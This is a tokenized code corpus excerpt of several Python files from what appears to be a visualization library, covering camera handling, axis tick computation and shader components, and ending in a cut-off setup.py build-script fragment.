<NUM_LIT:1> ] = float ( y [ <NUM_LIT:0> ] ) , float ( y [ <NUM_LIT:1> ] ) <EOL> if z is not None : <EOL> bounds [ <NUM_LIT:2> ] = float ( z [ <NUM_LIT:0> ] ) , float ( z [ <NUM_LIT:1> ] ) <EOL> if self . _viewbox is None : <EOL> self . _set_range_args = bounds [ <NUM_LIT:0> ] , bounds [ <NUM_LIT:1> ] , bounds [ <NUM_LIT:2> ] , margin <EOL> return <EOL> self . _resetting = True <EOL> if all ( [ ( b is None ) for b in bounds ] ) : <EOL> bounds = self . _viewbox . get_scene_bounds ( ) <EOL> else : <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> if bounds [ i ] is None : <EOL> bounds [ i ] = self . _viewbox . get_scene_bounds ( i ) <EOL> ranges = [ b [ <NUM_LIT:1> ] - b [ <NUM_LIT:0> ] for b in bounds ] <EOL> margins = [ ( r * margin or <NUM_LIT:0.1> ) for r in ranges ] <EOL> bounds_margins = [ ( b [ <NUM_LIT:0> ] - m , b [ <NUM_LIT:1> ] + m ) for b , m in zip ( bounds , margins ) ] <EOL> self . _xlim , self . _ylim , self . _zlim = bounds_margins <EOL> if ( not init ) or ( self . _center is None ) : <EOL> self . _center = [ ( b [ <NUM_LIT:0> ] + r / <NUM_LIT:2> ) for b , r in zip ( bounds , ranges ) ] <EOL> self . _set_range ( init ) <EOL> self . _resetting = False <EOL> self . view_changed ( ) <EOL> def _set_range ( self , init ) : <EOL> pass <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . set_state ( self . _default_state ) <EOL> def set_default_state ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _default_state = self . get_state ( ) <EOL> def get_state ( self ) : <EOL> """<STR_LIT>""" <EOL> D = { } <EOL> for key in self . _state_props : <EOL> D [ key ] = getattr ( self , key ) <EOL> return D <EOL> def set_state ( self , state = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> D = state or { } <EOL> D . update ( kwargs ) <EOL> for key , val in D . items ( ) : <EOL> if key not in self . _state_props : <EOL> raise KeyError ( '<STR_LIT>' % key ) <EOL> setattr ( self , key , val ) <EOL> def link ( self , camera ) : <EOL> """<STR_LIT>""" <EOL> cam1 , cam2 = self , camera <EOL> while cam1 in cam2 . _linked_cameras : <EOL> cam2 . _linked_cameras . remove ( cam1 ) <EOL> while cam2 in cam1 . _linked_cameras : <EOL> cam1 . _linked_cameras . remove ( cam2 ) <EOL> cam1 . _linked_cameras . append ( cam2 ) <EOL> cam2 . _linked_cameras . append ( cam1 ) <EOL> def view_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _resetting : <EOL> return <EOL> if self . _viewbox : <EOL> if self . _xlim is None : <EOL> args = self . _set_range_args or ( ) <EOL> self . set_range ( * args ) <EOL> if self . _default_state is None : <EOL> self . set_default_state ( ) <EOL> self . _update_transform ( ) <EOL> @ property <EOL> def pre_transform ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pre_transform <EOL> @ pre_transform . setter <EOL> def pre_transform ( self , tr ) : <EOL> self . _pre_transform = tr <EOL> self . view_changed ( ) <EOL> def viewbox_mouse_event ( self , event ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def on_canvas_change ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . old is not None : <EOL> event . old . events . key_press . disconnect ( self . viewbox_key_event ) <EOL> event . old . events . key_release . disconnect ( self . viewbox_key_event ) <EOL> if event . new is not None : <EOL> event . new . events . key_press . connect ( self . viewbox_key_event ) <EOL> event . new . events . key_release . connect ( self . viewbox_key_event ) <EOL> def viewbox_key_event ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . key == keys . BACKSPACE : <EOL> self . reset ( ) <EOL> def viewbox_resize_event ( self , event ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _update_transform ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _set_scene_transform ( self . transform ) <EOL> def _set_scene_transform ( self , tr ) : <EOL> """<STR_LIT>""" <EOL> pre_tr = self . pre_transform <EOL> if pre_tr is None : <EOL> self . _scene_transform = tr <EOL> else : <EOL> self . _transform_cache . roll ( ) <EOL> self . _scene_transform = self . _transform_cache . get ( [ pre_tr , tr ] ) <EOL> self . _scene_transform . dynamic = True <EOL> self . _viewbox . scene . transform = self . _scene_transform <EOL> self . _viewbox . update ( ) <EOL> for cam in self . _linked_cameras : <EOL> if cam is self . _linked_cameras_no_update : <EOL> continue <EOL> try : <EOL> cam . _linked_cameras_no_update = self <EOL> cam . set_state ( self . get_state ( ) ) <EOL> finally : <EOL> cam . _linked_cameras_no_update = None </s>
<s> class SimpleBunch ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> dict . __init__ ( self , kwargs ) <EOL> self . __dict__ = self </s>
<s> namespace = '<STR_LIT>' <EOL> dpi = <NUM_LIT> <EOL> units = { <EOL> None : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : dpi , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT:%>' : <NUM_LIT:1> / <NUM_LIT> <EOL> } </s>
<s> import numpy as np <EOL> from . visual import CompoundVisual <EOL> from . line import LineVisual <EOL> from . text import TextVisual <EOL> class AxisVisual ( CompoundVisual ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pos = None , domain = ( <NUM_LIT:0.> , <NUM_LIT:1.> ) , tick_direction = ( - <NUM_LIT:1.> , <NUM_LIT:0.> ) , <EOL> scale_type = "<STR_LIT>" , axis_color = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> tick_color = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , text_color = '<STR_LIT:w>' , font_size = <NUM_LIT:8> ) : <EOL> if scale_type != '<STR_LIT>' : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _pos = None <EOL> self . _domain = None <EOL> self . _stop_at_major = ( False , False ) <EOL> self . ticker = Ticker ( self ) <EOL> self . tick_direction = np . array ( tick_direction , float ) <EOL> self . tick_direction = self . tick_direction <EOL> self . scale_type = scale_type <EOL> self . axis_color = axis_color <EOL> self . tick_color = tick_color <EOL> self . minor_tick_length = <NUM_LIT:5> <EOL> self . major_tick_length = <NUM_LIT:10> <EOL> self . label_margin = <NUM_LIT:5> <EOL> self . _need_update = True <EOL> self . _line = LineVisual ( method = '<STR_LIT>' , width = <NUM_LIT> ) <EOL> self . _ticks = LineVisual ( method = '<STR_LIT>' , width = <NUM_LIT> , connect = '<STR_LIT>' ) <EOL> self . _text = TextVisual ( font_size = font_size , color = text_color ) <EOL> CompoundVisual . __init__ ( self , [ self . _line , self . _text , self . _ticks ] ) <EOL> if pos is not None : <EOL> self . pos = pos <EOL> self . domain = domain <EOL> @ property <EOL> def pos ( self ) : <EOL> return self . _pos <EOL> @ pos . setter <EOL> def pos ( self , pos ) : <EOL> self . _pos = np . array ( pos , float ) <EOL> self . _need_update = True <EOL> self . update ( ) <EOL> @ property <EOL> def domain ( self ) : <EOL> return self . _domain <EOL> @ domain . setter <EOL> def domain ( self , d ) : <EOL> if self . _domain is None or d != self . _domain : <EOL> self . _domain = d <EOL> self . _need_update = True <EOL> self . update ( ) <EOL> @ property <EOL> def _vec ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . pos [ <NUM_LIT:1> ] - self . pos [ <NUM_LIT:0> ] <EOL> def _update_subvisuals ( self ) : <EOL> tick_pos , labels , label_pos , anchors = self . ticker . get_update ( ) <EOL> self . _line . set_data ( pos = self . pos , color = self . axis_color ) <EOL> self . _ticks . set_data ( pos = tick_pos , color = self . tick_color ) <EOL> self . _text . text = list ( labels ) <EOL> self . _text . pos = label_pos <EOL> self . _text . anchors = anchors <EOL> self . _need_update = False <EOL> def _prepare_draw ( self , view ) : <EOL> if self . _pos is None : <EOL> return False <EOL> if self . _need_update : <EOL> self . _update_subvisuals ( ) <EOL> def _compute_bounds ( self , axis , view ) : <EOL> if axis == <NUM_LIT:2> : <EOL> return ( <NUM_LIT:0.> , <NUM_LIT:0.> ) <EOL> return self . pos [ : , axis ] . min ( ) , self . pos [ : , axis ] . max ( ) <EOL> class Ticker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , axis ) : <EOL> self . axis = axis <EOL> def get_update ( self ) : <EOL> major_tick_fractions , minor_tick_fractions , tick_labels = self . _get_tick_frac_labels ( ) <EOL> tick_pos , label_pos , anchors = self . _get_tick_positions ( <EOL> major_tick_fractions , minor_tick_fractions ) <EOL> return tick_pos , tick_labels , label_pos , anchors <EOL> def _get_tick_positions ( self , major_tick_fractions , minor_tick_fractions ) : <EOL> trs = self . axis . transforms <EOL> visual_to_document = trs . get_transform ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> direction = np . array ( self . axis . tick_direction ) <EOL> direction /= np . linalg . norm ( direction ) <EOL> anchors = [ ] <EOL> if direction [ <NUM_LIT:0> ] < <NUM_LIT:0> : <EOL> anchors . append ( '<STR_LIT:right>' ) <EOL> elif direction [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> anchors . append ( '<STR_LIT:left>' ) <EOL> else : <EOL> anchors . append ( '<STR_LIT>' ) <EOL> if direction [ <NUM_LIT:1> ] < <NUM_LIT:0> : <EOL> anchors . append ( '<STR_LIT>' ) <EOL> elif direction [ <NUM_LIT:1> ] > <NUM_LIT:0> : <EOL> anchors . append ( '<STR_LIT>' ) <EOL> else : <EOL> anchors . append ( '<STR_LIT>' ) <EOL> doc_unit = visual_to_document . map ( [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , direction [ : <NUM_LIT:2> ] ] ) <EOL> doc_unit = doc_unit [ <NUM_LIT:1> ] - doc_unit [ <NUM_LIT:0> ] <EOL> doc_len = np . linalg . norm ( doc_unit ) <EOL> vectors = np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> direction * self . axis . minor_tick_length / doc_len , <EOL> direction * self . axis . major_tick_length / doc_len , <EOL> direction * ( self . axis . major_tick_length + <EOL> self . axis . label_margin ) / doc_len ] , <EOL> dtype = float ) <EOL> minor_vector = vectors [ <NUM_LIT:1> ] - vectors [ <NUM_LIT:0> ] <EOL> major_vector = vectors [ <NUM_LIT:2> ] - vectors [ <NUM_LIT:0> ] <EOL> label_vector = vectors [ <NUM_LIT:3> ] - vectors [ <NUM_LIT:0> ] <EOL> major_origins , major_endpoints = self . _tile_ticks ( <EOL> major_tick_fractions , major_vector ) <EOL> minor_origins , minor_endpoints = self . _tile_ticks ( <EOL> minor_tick_fractions , minor_vector ) <EOL> tick_label_pos = major_origins + label_vector <EOL> num_major = len ( major_tick_fractions ) <EOL> num_minor = len ( minor_tick_fractions ) <EOL> c = np . empty ( [ ( num_major + num_minor ) * <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> c [ <NUM_LIT:0> : ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:1> : <NUM_LIT:2> ] = major_origins <EOL> c [ <NUM_LIT:1> : ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:2> : <NUM_LIT:2> ] = major_endpoints <EOL> c [ ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:2> : : <NUM_LIT:2> ] = minor_origins <EOL> c [ ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:3> : : <NUM_LIT:2> ] = minor_endpoints <EOL> return c , tick_label_pos , anchors <EOL> def _tile_ticks ( self , frac , tickvec ) : <EOL> """<STR_LIT>""" <EOL> origins = np . tile ( self . axis . _vec , ( len ( frac ) , <NUM_LIT:1> ) ) <EOL> origins = self . axis . pos [ <NUM_LIT:0> ] . T + ( origins . T * frac ) . T <EOL> endpoints = tickvec + origins <EOL> return origins , endpoints <EOL> def _get_tick_frac_labels ( self ) : <EOL> """<STR_LIT>""" <EOL> minor_num = <NUM_LIT:4> <EOL> if ( self . axis . scale_type == '<STR_LIT>' ) : <EOL> domain = self . axis . domain <EOL> if domain [ <NUM_LIT:1> ] < domain [ <NUM_LIT:0> ] : <EOL> flip = True <EOL> domain = domain [ : : - <NUM_LIT:1> ] <EOL> else : <EOL> flip = False <EOL> offset = domain [ <NUM_LIT:0> ] <EOL> scale = domain [ <NUM_LIT:1> ] - domain [ <NUM_LIT:0> ] <EOL> transforms = self . axis . transforms <EOL> length = self . axis . pos [ <NUM_LIT:1> ] - self . axis . pos [ <NUM_LIT:0> ] <EOL> n_inches = np . sqrt ( np . sum ( length ** <NUM_LIT:2> ) ) / transforms . dpi <EOL> major = _get_ticks_talbot ( domain [ <NUM_LIT:0> ] , domain [ <NUM_LIT:1> ] , n_inches , <NUM_LIT:2> ) <EOL> labels = [ '<STR_LIT>' % x for x in major ] <EOL> majstep = major [ <NUM_LIT:1> ] - major [ <NUM_LIT:0> ] <EOL> minor = [ ] <EOL> minstep = majstep / ( minor_num + <NUM_LIT:1> ) <EOL> minstart = <NUM_LIT:0> if self . axis . _stop_at_major [ <NUM_LIT:0> ] else - <NUM_LIT:1> <EOL> minstop = - <NUM_LIT:1> if self . axis . _stop_at_major [ <NUM_LIT:1> ] else <NUM_LIT:0> <EOL> for i in range ( minstart , len ( major ) + minstop ) : <EOL> maj = major [ <NUM_LIT:0> ] + i * majstep <EOL> minor . extend ( np . linspace ( maj + minstep , <EOL> maj + majstep - minstep , <EOL> minor_num ) ) <EOL> major_frac = ( major - offset ) / scale <EOL> minor_frac = ( np . array ( minor ) - offset ) / scale <EOL> major_frac = major_frac [ : : - <NUM_LIT:1> ] if flip else major_frac <EOL> use_mask = ( major_frac > - <NUM_LIT> ) & ( major_frac < <NUM_LIT> ) <EOL> major_frac = major_frac [ use_mask ] <EOL> labels = [ l for li , l in enumerate ( labels ) if use_mask [ li ] ] <EOL> minor_frac = minor_frac [ ( minor_frac > - <NUM_LIT> ) & <EOL> ( minor_frac < <NUM_LIT> ) ] <EOL> elif self . axis . scale_type == '<STR_LIT>' : <EOL> return NotImplementedError <EOL> elif self . axis . scale_type == '<STR_LIT>' : <EOL> return NotImplementedError <EOL> return major_frac , minor_frac , labels <EOL> class MaxNLocator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nbins = <NUM_LIT:10> , steps = None , trim = True , integer = False , <EOL> symmetric = False , prune = None ) : <EOL> """<STR_LIT>""" <EOL> self . _nbins = int ( nbins ) <EOL> self . _trim = trim <EOL> self . _integer = integer <EOL> self . _symmetric = symmetric <EOL> if prune is not None and prune not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> self . _prune = prune <EOL> if steps is None : <EOL> steps = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:8> , <NUM_LIT:10> ] <EOL> else : <EOL> if int ( steps [ - <NUM_LIT:1> ] ) != <NUM_LIT:10> : <EOL> steps = list ( steps ) <EOL> steps . append ( <NUM_LIT:10> ) <EOL> self . _steps = steps <EOL> self . _integer = integer <EOL> if self . _integer : <EOL> self . _steps = [ n for n in self . _steps <EOL> if divmod ( n , <NUM_LIT:1> ) [ <NUM_LIT:1> ] < <NUM_LIT> ] <EOL> def bin_boundaries ( self , vmin , vmax ) : <EOL> nbins = self . _nbins <EOL> scale , offset = scale_range ( vmin , vmax , nbins ) <EOL> if self . _integer : <EOL> scale = max ( <NUM_LIT:1> , scale ) <EOL> vmin = vmin - offset <EOL> vmax = vmax - offset <EOL> raw_step = ( vmax - vmin ) / nbins <EOL> scaled_raw_step = raw_step / scale <EOL> best_vmax = vmax <EOL> best_vmin = vmin <EOL> for step in self . _steps : <EOL> if step < scaled_raw_step : <EOL> continue <EOL> step *= scale <EOL> best_vmin = step * divmod ( vmin , step ) [ <NUM_LIT:0> ] <EOL> best_vmax = best_vmin + step * nbins <EOL> if ( best_vmax >= vmax ) : <EOL> break <EOL> if self . _trim : <EOL> extra_bins = int ( divmod ( ( best_vmax - vmax ) , step ) [ <NUM_LIT:0> ] ) <EOL> nbins -= extra_bins <EOL> return ( np . arange ( nbins + <NUM_LIT:1> ) * step + best_vmin + offset ) <EOL> def __call__ ( self ) : <EOL> vmin , vmax = self . axis . get_view_interval ( ) <EOL> return self . tick_values ( vmin , vmax ) <EOL> def tick_values ( self , vmin , vmax ) : <EOL> locs = self . bin_boundaries ( vmin , vmax ) <EOL> prune = self . _prune <EOL> if prune == '<STR_LIT>' : <EOL> locs = locs [ <NUM_LIT:1> : ] <EOL> elif prune == '<STR_LIT>' : <EOL> locs = locs [ : - <NUM_LIT:1> ] <EOL> elif prune == '<STR_LIT>' : <EOL> locs = locs [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return locs <EOL> def view_limits ( self , dmin , dmax ) : <EOL> if self . _symmetric : <EOL> maxabs = max ( abs ( dmin ) , abs ( dmax ) ) <EOL> dmin = - maxabs <EOL> dmax = maxabs <EOL> return np . take ( self . bin_boundaries ( dmin , dmax ) , [ <NUM_LIT:0> , - <NUM_LIT:1> ] ) <EOL> def scale_range ( vmin , vmax , n = <NUM_LIT:1> , threshold = <NUM_LIT:100> ) : <EOL> dv = abs ( vmax - vmin ) <EOL> if dv == <NUM_LIT:0> : <EOL> return <NUM_LIT:1.0> , <NUM_LIT:0.0> <EOL> meanv = <NUM_LIT:0.5> * ( vmax + vmin ) <EOL> if abs ( meanv ) / dv < threshold : <EOL> offset = <NUM_LIT:0> <EOL> elif meanv > <NUM_LIT:0> : <EOL> ex = divmod ( np . log10 ( meanv ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> offset = <NUM_LIT:10> ** ex <EOL> else : <EOL> ex = divmod ( np . log10 ( - meanv ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> offset = - <NUM_LIT:10> ** ex <EOL> ex = divmod ( np . log10 ( dv / n ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> scale = <NUM_LIT:10> ** ex <EOL> return scale , offset <EOL> def _coverage ( dmin , dmax , lmin , lmax ) : <EOL> return <NUM_LIT:1> - <NUM_LIT:0.5> * ( ( dmax - lmax ) ** <NUM_LIT:2> + <EOL> ( dmin - lmin ) ** <NUM_LIT:2> ) / ( <NUM_LIT:0.1> * ( dmax - dmin ) ) ** <NUM_LIT:2> <EOL> def _coverage_max ( dmin , dmax , span ) : <EOL> range_ = dmax - dmin <EOL> if span <= range_ : <EOL> return <NUM_LIT:1.> <EOL> else : <EOL> half = ( span - range_ ) / <NUM_LIT> <EOL> return <NUM_LIT:1> - half ** <NUM_LIT:2> / ( <NUM_LIT:0.1> * range_ ) ** <NUM_LIT:2> <EOL> def _density ( k , m , dmin , dmax , lmin , lmax ) : <EOL> r = ( k - <NUM_LIT:1.0> ) / ( lmax - lmin ) <EOL> rt = ( m - <NUM_LIT:1.0> ) / ( max ( lmax , dmax ) - min ( lmin , dmin ) ) <EOL> return <NUM_LIT:2> - max ( r / rt , rt / r ) <EOL> def _density_max ( k , m ) : <EOL> return <NUM_LIT:2> - ( k - <NUM_LIT:1.0> ) / ( m - <NUM_LIT:1.0> ) if k >= m else <NUM_LIT:1.> <EOL> def _simplicity ( q , Q , j , lmin , lmax , lstep ) : <EOL> eps = <NUM_LIT> <EOL> n = len ( Q ) <EOL> i = Q . index ( q ) + <NUM_LIT:1> <EOL> if ( ( lmin % lstep ) < eps or <EOL> ( lstep - lmin % lstep ) < eps ) and lmin <= <NUM_LIT:0> and lmax >= <NUM_LIT:0> : <EOL> v = <NUM_LIT:1> <EOL> else : <EOL> v = <NUM_LIT:0> <EOL> return ( n - i ) / ( n - <NUM_LIT:1.0> ) + v - j <EOL> def _simplicity_max ( q , Q , j ) : <EOL> n = len ( Q ) <EOL> i = Q . index ( q ) + <NUM_LIT:1> <EOL> return ( n - i ) / ( n - <NUM_LIT:1.0> ) + <NUM_LIT:1.> - j <EOL> def _get_ticks_talbot ( dmin , dmax , n_inches , density = <NUM_LIT:1.> ) : <EOL> n_inches = max ( n_inches , <NUM_LIT> ) <EOL> m = density * n_inches + <NUM_LIT:1.0> <EOL> only_inside = False <EOL> Q = [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:3> ] <EOL> w = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> ] <EOL> best_score = - <NUM_LIT> <EOL> best = None <EOL> j = <NUM_LIT:1.0> <EOL> n_max = <NUM_LIT:1000> <EOL> while j < n_max : <EOL> for q in Q : <EOL> sm = _simplicity_max ( q , Q , j ) <EOL> if w [ <NUM_LIT:0> ] * sm + w [ <NUM_LIT:1> ] + w [ <NUM_LIT:2> ] + w [ <NUM_LIT:3> ] < best_score : <EOL> j = n_max <EOL> break <EOL> k = <NUM_LIT> <EOL> while k < n_max : <EOL> dm = _density_max ( k , n_inches ) <EOL> if w [ <NUM_LIT:0> ] * sm + w [ <NUM_LIT:1> ] + w [ <NUM_LIT:2> ] * dm + w [ <NUM_LIT:3> ] < best_score : <EOL> break <EOL> delta = ( dmax - dmin ) / ( k + <NUM_LIT:1.0> ) / j / q <EOL> z = np . ceil ( np . log10 ( delta ) ) <EOL> while z < float ( '<STR_LIT>' ) : <EOL> step = j * q * <NUM_LIT:10> ** z <EOL> cm = _coverage_max ( dmin , dmax , step * ( k - <NUM_LIT:1.0> ) ) <EOL> if ( w [ <NUM_LIT:0> ] * sm + <EOL> w [ <NUM_LIT:1> ] * cm + <EOL> w [ <NUM_LIT:2> ] * dm + <EOL> w [ <NUM_LIT:3> ] < best_score ) : <EOL> break <EOL> min_start = np . floor ( dmax / step ) * j - ( k - <NUM_LIT:1.0> ) * j <EOL> max_start = np . ceil ( dmin / step ) * j <EOL> if min_start > max_start : <EOL> z = z + <NUM_LIT:1> <EOL> break <EOL> for start in range ( int ( min_start ) , int ( max_start ) + <NUM_LIT:1> ) : <EOL> lmin = start * ( step / j ) <EOL> lmax = lmin + step * ( k - <NUM_LIT:1.0> ) <EOL> lstep = step <EOL> s = _simplicity ( q , Q , j , lmin , lmax , lstep ) <EOL> c = _coverage ( dmin , dmax , lmin , lmax ) <EOL> d = _density ( k , m , dmin , dmax , lmin , lmax ) <EOL> l = <NUM_LIT:1.> <EOL> score = w [ <NUM_LIT:0> ] * s + w [ <NUM_LIT:1> ] * c + w [ <NUM_LIT:2> ] * d + w [ <NUM_LIT:3> ] * l <EOL> if ( score > best_score and <EOL> ( not only_inside or ( lmin >= dmin and <EOL> lmax <= dmax ) ) ) : <EOL> best_score = score <EOL> best = ( lmin , lmax , lstep , q , k ) <EOL> z += <NUM_LIT:1> <EOL> k += <NUM_LIT:1> <EOL> if k == n_max : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> j += <NUM_LIT:1> <EOL> if j == n_max : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if best is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return np . arange ( best [ <NUM_LIT:4> ] ) * best [ <NUM_LIT:2> ] + best [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from . component import VisualComponent <EOL> from . . shaders import Varying <EOL> class GridContourComponent ( VisualComponent ) : <EOL> """<STR_LIT>""" <EOL> SHADERS = dict ( <EOL> frag_color = """<STR_LIT>""" , <EOL> vert_post_hook = """<STR_LIT>""" ) <EOL> def __init__ ( self , spacing ) : <EOL> super ( GridContourComponent , self ) . __init__ ( ) <EOL> self . spacing = spacing <EOL> var = Varying ( '<STR_LIT>' , dtype = '<STR_LIT>' ) <EOL> self . _funcs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = var <EOL> self . _funcs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = var <EOL> @ property <EOL> def color ( self ) : <EOL> return self . _color <EOL> @ color . setter <EOL> def color ( self , c ) : <EOL> self . _color = c <EOL> def activate ( self , program , mode ) : <EOL> ff = self . _funcs [ '<STR_LIT>' ] <EOL> ff [ '<STR_LIT>' ] = self . spacing <EOL> class ShadingComponent ( VisualComponent ) : <EOL> """<STR_LIT>""" <EOL> SHADERS = dict ( <EOL> frag_color = """<STR_LIT>""" ) <EOL> def __init__ ( self , normal_comp , lights , ambient = <NUM_LIT> ) : <EOL> super ( ShadingComponent , self ) . __init__ ( ) <EOL> self . normal_comp = normal_comp <EOL> self . _deps = [ normal_comp ] <EOL> self . lights = lights <EOL> self . ambient = ambient <EOL> def activate ( self , program , mode ) : <EOL> ff = self . _funcs [ '<STR_LIT>' ] <EOL> ff [ '<STR_LIT>' ] = self . normal_comp . normal_shader ( ) <EOL> ff [ '<STR_LIT>' ] = tuple ( self . lights [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ : <NUM_LIT:3> ] ) + ( <NUM_LIT:1> , ) <EOL> ff [ '<STR_LIT>' ] = tuple ( self . lights [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ : <NUM_LIT:3> ] ) + ( <NUM_LIT:1> , ) <EOL> ff [ '<STR_LIT>' ] = self . ambient </s>
<s> from ... ext . six import string_types <EOL> from . shader_object import ShaderObject <EOL> class Expression ( ShaderObject ) : <EOL> """<STR_LIT>""" <EOL> def definition ( self , names ) : <EOL> return None <EOL> class TextExpression ( Expression ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text ) : <EOL> super ( TextExpression , self ) . __init__ ( ) <EOL> if not isinstance ( text , string_types ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . _text = text <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . text , id ( self ) ) <EOL> def expression ( self , names = None ) : <EOL> return self . _text <EOL> @ property <EOL> def text ( self ) : <EOL> return self . _text <EOL> @ text . setter <EOL> def text ( self , t ) : <EOL> self . _text = t <EOL> self . changed ( ) <EOL> def __eq__ ( self , a ) : <EOL> if isinstance ( a , TextExpression ) : <EOL> return a . _text == self . _text <EOL> elif isinstance ( a , string_types ) : <EOL> return a == self . _text <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return self . _text . __hash__ ( ) <EOL> class FunctionCall ( Expression ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , function , args ) : <EOL> from . function import Function <EOL> super ( FunctionCall , self ) . __init__ ( ) <EOL> if not isinstance ( function , Function ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> sig_len = len ( function . args ) <EOL> if len ( args ) != sig_len : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( function . name , sig_len , len ( args ) ) ) <EOL> sig = function . args <EOL> self . _function = function <EOL> self . _args = [ ShaderObject . create ( arg , ref = sig [ i ] [ <NUM_LIT:1> ] ) <EOL> for i , arg in enumerate ( args ) ] <EOL> self . _add_dep ( function ) <EOL> for arg in self . _args : <EOL> self . _add_dep ( arg ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . function . name , id ( self ) ) <EOL> @ property <EOL> def function ( self ) : <EOL> return self . _function <EOL> @ property <EOL> def dtype ( self ) : <EOL> return self . _function . rtype <EOL> def expression ( self , names ) : <EOL> str_args = [ arg . expression ( names ) for arg in self . _args ] <EOL> args = '<STR_LIT:U+002CU+0020>' . join ( str_args ) <EOL> fname = self . function . expression ( names ) <EOL> return '<STR_LIT>' % ( fname , args ) </s>
<s> from . text import TextVisual </s>
<s> from __future__ import absolute_import <EOL> from sys import version_info as v <EOL> if any ( [ v < ( <NUM_LIT:2> , <NUM_LIT:6> ) , ( <NUM_LIT:3> , ) < v < ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" % v [ : <NUM_LIT:2> ] ) <EOL> import os <EOL> from os . path import abspath <EOL> import sys <EOL> from setuptools import setup , Extension , find_packages <EOL> from setuptools . command . build_ext import build_ext <EOL> __builtins__ . __NUMPY_SETUP__ = False <EOL> class BuildExtNumpyInc ( build_ext ) : <EOL> def build_extensions ( self ) : <EOL> from numpy . distutils . misc_util import get_numpy_include_dirs <EOL> for e in self . extensions : <EOL> e . include_dirs . extend ( get_numpy_include_dirs ( ) ) <EOL> build_ext . build_extensions ( self ) <EOL> CFLAGS = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> LFLAGS = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> BLOSC_DIR = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> inc_dirs = [ abspath ( '<STR_LIT>' ) ] <EOL> lib_dirs = [ ] <EOL> libs = [ ] <EOL> def_macros = [ ] <EOL> sources = [ '<STR_LIT>' ] <EOL> optional_libs = [ ] <EOL> args = sys . argv [ : ] <EOL> for arg in args : <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> BLOSC_DIR = os . path . expanduser ( arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] ) <EOL> sys . argv . remove ( arg ) <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> LFLAGS = arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> 